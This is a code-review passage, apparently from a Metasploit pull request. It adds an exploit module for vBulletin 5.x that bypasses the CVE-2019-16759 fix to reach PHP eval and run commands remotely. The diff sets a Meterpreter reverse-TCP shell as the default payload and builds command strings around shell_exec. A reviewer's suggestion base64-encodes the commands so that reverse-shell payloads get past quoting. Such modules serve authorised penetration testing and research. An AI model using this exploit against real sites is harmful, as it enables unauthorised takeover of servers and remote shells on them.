modules/exploits/multi/http/vbulletin_widget_template_rce.rb

```diff
@@ -0,0 +1,141 @@
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',
+        'Description' => %q{
+          This module exploits a logic bug within the template rendering code in vBulletin 5.x.
+          The module uses the vBulletin template rendering functionality to render the
+          'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.
+          This causes the former template to load the latter bypassing filters originally put in place
+          to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input
+          allowing the module to achieve PHP remote code execution on the target. This module has been
+          tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
+        },
+        'Author' => [
+          'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],
+          ['CVE', '2020-7373']
+        ],
+        'DisclosureDate' => '2020-08-09',
+        'License' => MSF_LICENSE,
+        'Platform' => ['php', 'unix', 'windows'],
+        'Arch' => [ARCH_CMD, ARCH_PHP],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Meterpreter (PHP In-Memory)',
+            'Platform' => 'php',
+            'Arch' => [ARCH_PHP],
+            'Type' => :php_memory,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+              'DisablePayloadHandler' => false
+            }
+          ],
+          [
+            'Unix (CMD In-Memory)',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/generic',
+              'DisablePayloadHandler' => true
+            }
+          ],
+          [
+            'Windows (CMD In-Memory)',
+            'Platform' => 'windows',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_cmd,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/windows/generic',
+              'DisablePayloadHandler' => true
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),
+      OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])
+    ])
+
+  end
+
+  def cmd_payload(command)
+    return("echo #{datastore['PHP_CMD']}('#{command}'); exit;")
```

Comment:
The module was not working when I was testing with a command payload like `cmd/unix/reverse_python`. It appeared to be an issue with the not escaping the single quotes.

I updated this to the following which seemed to have addressed it.
```suggestion
    "echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;"
```

Reply:
Looks great, thank you @smcintyre-r7 !